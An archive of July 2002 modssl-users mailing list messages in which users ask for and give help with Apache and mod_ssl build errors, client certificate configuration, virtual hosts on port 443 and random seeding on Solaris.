Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C0B244CE697; Fri, 19 Jul 2002 21:38:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 271502874B; Fri, 19 Jul 2002 20:39:23 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id QAA05124; Fri, 19 Jul 2002 16:26:08 +0200 (MET DST)
Date: Fri, 19 Jul 2002 16:26:08 +0200 (MET DST)
Message-Id: <200207191426.QAA05124@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Netscape 4.x cause CPU loop with mod_ssl and Apache 2.0 (PR#735)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Thom Park
Version: Unknown
OS: Windows 2000
Submission from: (NULL) (192.216.194.16)


This may be a usage problem as opposed to a bug, but I'm stumped trying to get
around this.

I am using Apache 2.0.35 with the mod_ssl that came with that release, with
openssl version 0.9.6d on Windows 2000

everytime we try to use Netscape 4.x against an https page and a redirect event
occurs (302), the Apache that recieved the request goes into an infinite loop.

The redirect may be a red-herring, it may just be the first request, as most of
our initial request result in 302 responses.

Can you advise me if this is a known bug (searching the database didn't yield
much) or if the user-community have any suggestions on working around this issue
I'd love to hear from them.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 20 12:40:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA24092; Sat, 20 Jul 2002 12:39:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA24077; Sat, 20 Jul 2002 12:38:49 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 456864CE715; Sat, 20 Jul 2002 12:38:48 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BC4822884C; Sat, 20 Jul 2002 11:46:50 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id KAA19581; Sat, 20 Jul 2002 10:19:04 +0200 (MET DST)
Date: Sat, 20 Jul 2002 10:19:04 +0200 (MET DST)
Message-Id: <200207200819.KAA19581@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: Re: [BugDB] Netscape 4.x cause CPU loop with mod_ssl and Apache 2.0 (PR#735)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Jul 19, 2002 at 04:26:08PM +0200, modssl-bugdb@modssl.org wrote:
> Full_Name: Thom Park
> Version: Unknown
> OS: Windows 2000
> Submission from: (NULL) (192.216.194.16)
> 
> 
> This may be a usage problem as opposed to a bug, but I'm stumped trying to get
> around this.
> 
> I am using Apache 2.0.35 with the mod_ssl that came with that release, with
> openssl version 0.9.6d on Windows 2000
> 
First start by upgrading your apache (if for nothing else, then at least for
security reasons[1]). Much has happened in apache since 2.0.35 - most likely
your problem has already been fixed.

[1] http://httpd.apache.org/info/security_bulletin_20020620.txt
vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 20 12:40:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA24095; Sat, 20 Jul 2002 12:39:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA24078; Sat, 20 Jul 2002 12:38:49 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5E80F4CE74B; Sat, 20 Jul 2002 12:38:48 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 99FFD286BB; Sat, 20 Jul 2002 11:46:40 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fort-point-station.mit.edu id JAA18311; Sat, 20 Jul 2002 09:46:22 +0200 (MET DST)
Received: from central-city-carrier-station.mit.edu (CENTRAL-CITY-CARRIER-STATION.MIT.EDU [18.7.7.72])
	by fort-point-station.mit.edu (8.9.2/8.9.2) with ESMTP id DAA07404
	for ; Sat, 20 Jul 2002 03:46:21 -0400 (EDT)
Received: from melbourne-city-street.mit.edu (MELBOURNE-CITY-STREET.MIT.EDU [18.7.21.86])
	by central-city-carrier-station.mit.edu (8.9.2/8.9.2) with ESMTP id DAA00933
	for ; Sat, 20 Jul 2002 03:46:20 -0400 (EDT)
Received: from calloway.mit.edu (CALLOWAY.MIT.EDU [18.55.1.20])
	by melbourne-city-street.mit.edu (8.9.2/8.9.2) with ESMTP id DAA01144
	for ; Sat, 20 Jul 2002 03:46:19 -0400 (EDT)
Received: (from belg4mit@localhost) by calloway.mit.edu (8.9.3)
	id DAA09807; Sat, 20 Jul 2002 03:46:19 -0400
Message-Id: <200207200746.DAA09807@calloway.mit.edu>
To: modssl-users@modssl.org
Subject: SSLVerifyClient bug?
X-Organization: a) Discordia b) none c) what's that?
X-Content-Typo: gibberish, charset=ascii-art
Date: Sat, 20 Jul 2002 03:46:19 -0400
From: Jerrad Pierce 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jerrad Pierce 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I believe I have found a bug in SSLVerifyClient behavior.
Chapter 5 of the dox explain how to have a segment of a site
require a client cert, with the rest not. What I in fact
desire is the exact opposite.


	SSLVerifyClient require
	SSLVerifyDepth 1
	SSLCACertificateFile conf/ssl.crt/ca.crt
	
	SSLVerifyClient none
	

It seems as though this should work, but it does not.

-- 
H4sICNoBwDoAA3NpZwA9jbsNwDAIRHumuC4NklvXTOD0KSJEnwU8fHz4Q8M9i3sGzkS7BBrm
OkCTwsycb4S3DloZuMIYeXpLFqw5LaMhXC2ymhreVXNWMw9YGuAYdfmAbwomoPSyFJuFn2x8
Opr8bBBidccAAAA=
--
MOTD on Sweetmorn, the 55th of Confusion, in the YOLD 3168:
Oh boy! Rocket science at its best --JP
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 20 20:50:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA11089; Sat, 20 Jul 2002 20:49:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA11065; Sat, 20 Jul 2002 20:48:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2F8004CE715; Sat, 20 Jul 2002 20:48:45 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 52D0E2888F; Sat, 20 Jul 2002 20:48:32 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id PAA00388; Sat, 20 Jul 2002 15:54:07 +0200 (MET DST)
Date: Sat, 20 Jul 2002 15:54:07 +0200 (MET DST)
Message-Id: <200207201354.PAA00388@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] mod_ssl breakage with Bash v1 and not -ldbm for the linker (PR#737)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Sam Smith
Version: 2.8.7
OS: OpenBSD
Submission from: (NULL) (213.106.181.29)



If /bin/bash is Bash Version 1, and mod_ssl needs to be compiled using dbm
from libc, rather than libdbm, the configure script will pick up libdbm
rather than libc, making later parts of the configure script error out
when libdbm isn't found.

Full error is here:
  http://archives.neohapsis.com/archives/openbsd/2001-06/1516.html

OpenBSD already has a fix in tree here:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/httpd/src/modules/ssl/libssl.module
although that may not work cross platform.

Please contact me if you want/need more info


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 08:31:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA27864; Mon, 22 Jul 2002 08:30:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp02.iprimus.net.au id IAA27830; Mon, 22 Jul 2002 08:30:03 +0200 (MET DST)
Received: from primus.com.au ([210.50.209.190]) by smtp02.iprimus.net.au with Microsoft SMTPSVC(5.0.2195.4617);
	 Mon, 22 Jul 2002 15:46:18 +1000
Message-ID: <3D3B9B94.C11ECF29@primus.com.au>
Date: Mon, 22 Jul 2002 15:43:48 +1000
From: Ian Macdonald 
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.7-10 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Compiling apache with mod_perl + mod_ssl on HP-UX 10.2; link problem
References: <3D37B94F.9E354158@primus.com.au> <20020719073051.GA13345@serv01.aet.tu-cottbus.de>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 22 Jul 2002 05:46:19.0104 (UTC) FILETIME=[1A25A600:01C23143]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Macdonald 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Lutz; I've gone with option 1 (easier in the short term) and it
works fine. Keeping option 2 in reserve for now.

Just in case I come across something that demands the gnu ld, do you
know why this is hard to find for HP-UX? And does hard==impossible?

Thanks again,
Ian 
-- 
Ian Macdonald
ickphum@primus.com.au

Lutz Jaenicke wrote:
> 
> On Fri, Jul 19, 2002 at 05:01:35PM +1000, Ian Macdonald wrote:
> > I've been running apache 1.3.26 with mod_perl 1.26 statically linked in
> > for a while now with no problems.
> >
> > I've recently tried to add mod_ssl to the configuration and the apache
> > build now fails at the final link like so:
> >
> > cc  -DHPUX10 -Aa -Ae -D_HPUX_SOURCE -DMOD_SSL=208110 -DMOD_PERL
> > -DUSE_PERL_SSI  -Ae -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
> > -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED -Ae -D_LARGEFILE_SOURCE
> > -D_FILE_OFFSET_BITS=64  `./apaci` -L/usr/local/ssl/lib   \
> >               -o httpd buildmark.o modules.o  modules/ssl/libssl.a
> > modules/perl/libperl.a  modules/standard/libstandard.a  main/libmain.a
> > ./os/unix/libos.a  ap/libap.a regex/libregex.a   -ldbm -lssl -lcrypto
> > -Wl,-E -Wl,-B,deferred
> > /opt/perl5/lib/5.6.1/PA-RISC1.1/auto/DynaLoader/DynaLoader.a
> > -L/opt/perl5/lib/5.6.1/PA-RISC1.1/CORE -lperl -lnsl_s -ldld -lm -lc
> > -lndir -lcrypt -lsec  -lm
> > /usr/ccs/bin/ld: Unsatisfied symbols:
> >    __umoddi3 (code)
> >    __udivdi3 (code)
> > *** Error exit code 1
> >
> > Searching on the mod_perl list archive revealed one answer which was to
> > use the GNU ld instead; unfortunately, this doesn't seem easy on HP-UX,
> > as ld is not part of the standard GNU binutils package for HP-UX and
> > compiling the generic binutils manually doesn't build any version of ld
> > as far as I could tell.
> 
> This solution is only partly correct.
> The real reason for your problem is that at least some of your objects
> have been compiled with gcc. The missing functions are part of libgcc.a,
> which is available somewhere in your gcc installation.
> >From your "nm" of libcrypto.a it seems that openssl was compiled with gcc.
> Thus, 2 possible solutions:
> * Add -L/path/to/where/libgcc/is/ -lgcc after -lcrypto, maybe at the end of
>   the list. (I think this is what GNU ld makes automatically.)
> * Recompile every component using HP's compiler. That's how I do it.
>   Works fine for me :-)
> 
> Best regards,
>         Lutz
> --
> Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
> http://www.aet.TU-Cottbus.DE/personen/jaenicke/
> BTU Cottbus, Allgemeine Elektrotechnik
> Universitaetsplatz 3-4, D-03044 Cottbus
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 09:26:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA00670; Mon, 22 Jul 2002 09:25:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id JAA00654; Mon, 22 Jul 2002 09:25:04 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 831762E96
	for ; Mon, 22 Jul 2002 09:25:03 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 670122E91; Mon, 22 Jul 2002 09:25:00 +0200 (METDST)
Date: Mon, 22 Jul 2002 09:25:00 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Compiling apache with mod_perl + mod_ssl on HP-UX 10.2; link problem
Message-ID: <20020722072500.GA4175@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <3D37B94F.9E354158@primus.com.au> <20020719073051.GA13345@serv01.aet.tu-cottbus.de> <3D3B9B94.C11ECF29@primus.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3D3B9B94.C11ECF29@primus.com.au>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Jul 22, 2002 at 03:43:48PM +1000, Ian Macdonald wrote:
> Thanks Lutz; I've gone with option 1 (easier in the short term) and it
> works fine. Keeping option 2 in reserve for now.
> 
> Just in case I come across something that demands the gnu ld, do you
> know why this is hard to find for HP-UX? And does hard==impossible?

As far as I know, gnu ld does not support HP-UX and I am not aware of
any effort of the GNU people to build one. I don't know why this is the
case. From the past (I use HP-UX for a decade), GCC also could not generate
debugger support in the object files (-g not supported), which was due to
HP not revealing the technical details. Now, that GDB is the standard
debugger for HP-UX, this is of course different.
HP's 32bit object format is somewhat proprietary, but the 64bit format
now is standard ELF. I therefore suspect, that nobody will spend the time
to adapt GNU ld for HP.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 15:32:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA20517; Mon, 22 Jul 2002 15:31:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id PAA20486; Mon, 22 Jul 2002 15:30:33 +0200 (MET DST)
Date: Mon, 22 Jul 2002 06:35:43 -0700
Message-Id: <200207220635.AA563806636@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: apache dso and Mod_ssl
X-Mailer: 
X-IMSTrailer: __IMail_5__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I know  i ask a connex question but ...

is there a way to get a compiled-Mod_ssl 
that works on DSO compiled apache (without EAPI) ???

because i still don't find websphere module sources
and i need to have Websphere and SSL on a unique instance

(because :
i do authenticate client by certificat with Websphere,
it gets the HTTPS's info from SSL cert and use it to provide
Access right and such ... )

... it was working well with iplanet 

and i hope to make it work the same way with apache ...

THX 




__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 15:38:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA20843; Mon, 22 Jul 2002 15:37:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA20821; Mon, 22 Jul 2002 15:36:32 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id PAA07627
	for ; Mon, 22 Jul 2002 15:36:31 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id PAB27245
	for ; Mon, 22 Jul 2002 15:36:31 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: apache dso and Mod_ssl
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Mon, 22 Jul 2002 15:36:30 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA920D@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: apache dso and Mod_ssl
Thread-Index: AcIxhEzwILfBOPrSSY6KhqmvrFLL2wAACTDA
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA20840
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

As far as I understand, the Extended API was written specifically to allow mod_ssl to access the openssl libraries, so mod_ssl simply cannot work without EAPI.

rgds,

Owen Boyle

>-----Original Message-----
>From: arcean [mailto:arcean@lopette.org]
>Sent: Montag, 22. Juli 2002 15:36
>To: modssl-users@modssl.org
>Subject: apache dso and Mod_ssl
>
>
>I know  i ask a connex question but ...
>
>is there a way to get a compiled-Mod_ssl 
>that works on DSO compiled apache (without EAPI) ???
>
>because i still don't find websphere module sources
>and i need to have Websphere and SSL on a unique instance
>
>(because :
>i do authenticate client by certificat with Websphere,
>it gets the HTTPS's info from SSL cert and use it to provide
>Access right and such ... )
>
>... it was working well with iplanet 
>
>and i hope to make it work the same way with apache ...
>
>THX 
>
>
>
>
>__________________________________________________
>D O T E A S Y - "Join the web hosting revolution!"
>             http://www.doteasy.com
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 15:46:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA21202; Mon, 22 Jul 2002 15:45:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id PAA21154; Mon, 22 Jul 2002 15:44:49 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.9.3+Sun/8.9.3) with ESMTP id PAA12257
	for ; Mon, 22 Jul 2002 15:44:48 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA27567
	for ; Mon, 22 Jul 2002 15:44:48 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: virtual host port 443
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Mon, 22 Jul 2002 15:44:48 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8BED@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: virtual host port 443
Thread-Index: AcIu+SQi7KnVRFjxRUiSNGbFdciw2wCi7DPw
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA21183
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: ann wallace [mailto:anners@allevil.net]
>
>i have one virtualhost set up to use port 443, but for some 
>reason if you go
>to any of the virtualhost set up on port 80, via https it 
>defaults to the
>one host set up on port 443.

Of course it does. Your statement:

	"if you go to any of the virtualhost set up on port 80, via https" 

is mistaken. If you say "https://www.blah.blah/" then the browser will assume port 443 because you said "https". At this stage, the browser doesn't yet know that the server has a virtual host on port 80 called "www.blah.blah". So it makes a request to the server ip address on port 443 and so you get the SSL site.

The problem is that your statement isn't true. You could actually do what you say by entering https://www.blah.blah:80/ in your browser. Now your browser will try to establish an SSL connection on port 80. This will fail with a server error because your server does not speak SSL on that port.

rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 16:57:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA25348; Mon, 22 Jul 2002 16:56:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from huggins.bsd.uchicago.edu id QAA25319; Mon, 22 Jul 2002 16:55:42 +0200 (MET DST)
Received: from huggins.bsd.uchicago.edu (localhost [127.0.0.1])
	by huggins.bsd.uchicago.edu (8.12.4/8.12.4) with ESMTP id g6MEoeoq009063
	for ; Mon, 22 Jul 2002 09:50:40 -0500 (CDT)
Received: (from nobody@localhost)
	by huggins.bsd.uchicago.edu (8.12.4/8.12.4/Submit) id g6MEoddj009062
	for modssl-users@modssl.org; Mon, 22 Jul 2002 14:50:39 GMT
X-Authentication-Warning: huggins.bsd.uchicago.edu: nobody set sender to imiller@bsd.uchicago.edu using -f
Received: from 128.135.182.190 ( [128.135.182.190])
	as user imiller@huggins.bsd.uchicago.edu by webemail.bsd.uchicago.edu with HTTP;
	Mon, 22 Jul 2002 09:50:39 +0100
Message-ID: <1027349439.3d3c1bbfd46cc@webemail.bsd.uchicago.edu>
Date: Mon, 22 Jul 2002 09:50:39 +0100
From: Ian Miller 
To: modssl-users@modssl.org
Subject: Re: solaris 8 random number seed
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Miller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Solaris 8 now does have /dev/random it's a patch # 112438-01
Quoting Greg Hamilton :

> Hi,
> 
> I'm having the popular 'Solaris 8 has no /dev/random' problem.
> 
> I'm using openssl-0.9.6b and I don't have the option to upgrade nor can 
> I add the Solaris patch to create /dev/random. (30 odd live servers 
> which I'm not allowed to reboot or mangle if it can be avoided)
> 
> I've installed egd and pgrnd packages downloaded from sunfreeware.com.
> 
> If I use the openssl command line utility then, provided I've created a 
> .rnd seed file in my home directory, I can create keys, etc. without 
> seeing errors about the random number generator being un-seeded.
> 
> The same is not true for Apache with mod_ssl.
> 
> I don't know how to let mod_ssl / Apache know where the random number 
> seed file is.
> 
> Any help would be greatly appreciated.
> 
> Greg Hamilton
> 


-- 
Ian Miller
Sr. Systems Engineer
University of Chicago
imiller@bsd.uchicago.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 17:20:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA27104; Mon, 22 Jul 2002 17:19:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from psa-relay8.mpsa.com id RAA27021; Mon, 22 Jul 2002 17:18:13 +0200 (MET DST)
From: abdel.ramli@mpsa.com
Received: from aigti2.domino.inetpsa.com ([192.168.2.35]) by
          psa-relay8.mpsa.com (Netscape Messaging Server 4.15) with ESMTP
          id GZNP7A00.2AH; Mon, 22 Jul 2002 17:18:46 +0200 
Subject: can't compile with modssl
X-Mailer: Lotus Notes Release 5.0.8  June 18, 2001
Message-ID: 
Date: Mon, 22 Jul 2002 17:17:56 +0200
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org, owner-modssl-users@modssl.org
X-MIMETrack: Serialize by Router on AIGTI2.DOMINO/S/PSA(Release 5.0.8 |June 18, 2001) at
 22/07/2002 05:17:59 PM
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA27076
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abdel.ramli@mpsa.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi all,

I've followed all the instructions to get my Apache compiled with mod_SSL
and I'm keeping getting the following error after making my "modSSL patched
Apache sources.)

Please help if you can, I'ld appreciate very much.

Thanx
The compile looks OK until it suddenly stop giving the following error :


gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208110
-DUSE_HSRE
GEX -DEAPI -DEAPI `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDB
M -I/soft/sources/PSA_Lamp_1.0.1/openssl-0.9.6d/include -DMOD_SSL_VERSION
=""2.8.
10"" mod_ssl.c && mv mod_ssl.o mod_ssl.lo
mod_ssl.c:76: malformed floating constant
mod_ssl.c:76: parse error before `2.8'
mod_ssl.c:77: malformed floating constant
mod_ssl.c:77: parse error before `2.8'
make[4]: *** [mod_ssl.lo] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/soft/sources/PSA_Lamp_1.0.1/apache_1.3.26/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/soft/sources/PSA_Lamp_1.0.1/apache_1.3.26'
make: *** [build] Error 2
{op}@bexh35 #



                         \\\___///
                         \\  _ _  //
                       (  @ @  )
+-------------------oOOo-(_)-oOOo--------------------+

Abdel RAMLI
abdel.ramli@mpsa.com
Consultant Altaïr Technologies
PSA Peugeot Citroën | site de Bessoncourt
Unité: DINQ/DSIN/INSI/ETSO/PRD
Tel : 03 84 46 92 79 (229279)
+--------------------------- ---Oooo-------------------+
                       oooO        (  )
                       (  )         )/
                        \(         (_)
                        (_)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 17:35:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA28049; Mon, 22 Jul 2002 17:34:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from psa-relay3.mpsa.com id RAA27977; Mon, 22 Jul 2002 17:33:53 +0200 (MET DST)
From: abdel.ramli@mpsa.com
Received: from aigti2.domino.inetpsa.com ([192.168.2.25]) by
          psa-relay3.mpsa.com (Netscape Messaging Server 4.15) with ESMTP
          id GZNPXM03.4TD for ; Mon, 22 Jul 2002
          17:34:34 +0200 
Subject: =?iso-8859-1?Q?R=E9f=2E_=3A_can't_compile_with_modssl?=
X-Mailer: Lotus Notes Release 5.0.8  June 18, 2001
